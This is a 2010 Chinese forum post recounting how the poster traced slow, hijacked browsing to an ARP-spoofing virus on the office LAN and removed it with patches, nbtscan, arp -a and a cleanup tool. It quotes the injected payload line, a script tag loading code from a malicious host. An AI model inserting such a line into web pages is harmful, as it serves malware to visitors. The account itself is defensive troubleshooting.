Arp病毒日记!

社区服务
高级搜索
猴岛论坛电脑百科Arp病毒日记!
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
4个回复

Arp病毒日记!

楼层直达
繁华de都市

ZxID:2491893

等级: 贵宾

举报 只看楼主 使用道具 楼主   发表于: 2010-03-30 0
文章作者:CCN
上午

打开办公室电脑的浏览器上网,打开速度出奇的慢,而且打开霏凡后还出现页面错误,查看一下错误提示,出现一个网址 http://9166.biz/1.htm 代码错误,看来浏览器有病毒“劫持”了,ping了一下,还是个韩国的地址!

1 . 首要做的观察进程:冰刃里没有可疑进程,服务里也没发现可疑的!这就怪了?hijack日志基本上干干净净,启动项目页无异常!

2.  打开杀软nod32,升级后在内存和系统盘终没有查到病毒,同时在安全模式下用Dr.Web查毒,也没有发现,这下我真正郁闷了!最信任的Dr.Web都没有发现!

仔细分析一下:在打开网页时杀软有病毒报警,”IE浏览器创建了一个病毒进程”,”自动删除”,刷新页面重新出现病毒报警!看来是网页病毒!重打开冰刃,在端口连接中看到 ie进程连接到病毒网站的 ip!看来,或者浏览器设置有问题,或者有dll木马插入ie进程!

3. 按照技术区的朋友说的 ,搜索系统文件夹,搜索内容为该网站地址,但一无所获,清理完ie的临时文件夹,看看局域网*****设置也是空的,上googel,没有问题,进 霏凡的时候又提示“正在打开http://9166.biz/1.htm ”,又跑进来了还是根本没送走?进51.com的个人主页根本不行!

换用了火狐,一样会在端口连接里看到我 可爱的火狐 和那恶意网站手握手已经建立连接,唉,真郁闷,我怀疑还是dll劫持,但分析了ie和火狐的dll,太多,杀软又无法查到,真的不知所措!


下午

下个360的专杀工具,没有查到!郁闷!

到bbs问问网友吧!听听龙族朋友的意见:

“开机,F8,选择“带网络连接的安全模式”
进入系统后下载安装这两个程序
http://dl.360safe.com/setup.exe
http://tool.ikaka.com/DownloadTool.asp?tools=1
分别用它们修复系统,清理流氓软件”

“试试avg杀毒看看啦。。。。”

基本还是查毒为主,一一试了,还是不管用,一位朋友说到(局域网电脑感染了ARP病毒,该病毒会修改同网段电脑的ARP表,使同网段所有电脑的路由通过染毒机器,病毒会将HTTP包解包以后,加上病毒代码后重新封包,转发出去。该病毒是利用微软操作系统得MS06-014和MS07-017漏洞传播的,如果没有安装这两个漏洞的补丁,访问带病毒的网页,或者同网段有机器带毒,就会被感染成为毒源。)呵呵,那就打补丁吧,装好MS06-014和MS07-017补丁,打开网页没报错了,但速度还是有点影响,既然说到病毒会将HTTP包加病毒代码重新封装转发,我想到是不是网页代码被修改了,忍不住查看一下有问题网页的源代码,第一行赫赫显示着<script src=http://9166.biz/w.js></script> ,看来真如所料,是arp病毒!

【解决方法】既然确定是arp病毒,开个cmd,输入 nbtscan -r 10.10.10.0/24,注意这个命令有时观察不完整,需要跟个 arp -a命令查看 arp表,观察到一mm的电脑跟网关电脑的 mac地址相同,给mm传个 360 的专杀工具,1秒就搞定,重新启动,总算网络太平!
书山有路勤为径 学海无涯苦作舟
gg19932195

ZxID:9802271

等级: 列兵
举报 只看该作者 4楼  发表于: 2010-03-30 0
路过!

ZxID:10921397

等级: 上校
配偶: 宝宝xc
一 直 被 超 越 , 从 未 被 模 仿

举报 只看该作者 地板   发表于: 2010-03-30 0
学习 学习
面包丶

ZxID:11442797

等级: 少将

举报 只看该作者 板凳   发表于: 2010-03-30 0
不看帖子,刷刀
我爱挑战自身极限。
丿蛋灬疼|哥彡

ZxID:4040931

等级: 上将
猴岛变样了。

举报 只看该作者 沙发   发表于: 2010-03-30 0
看不懂。。飘过
« 返回列表
发帖 回复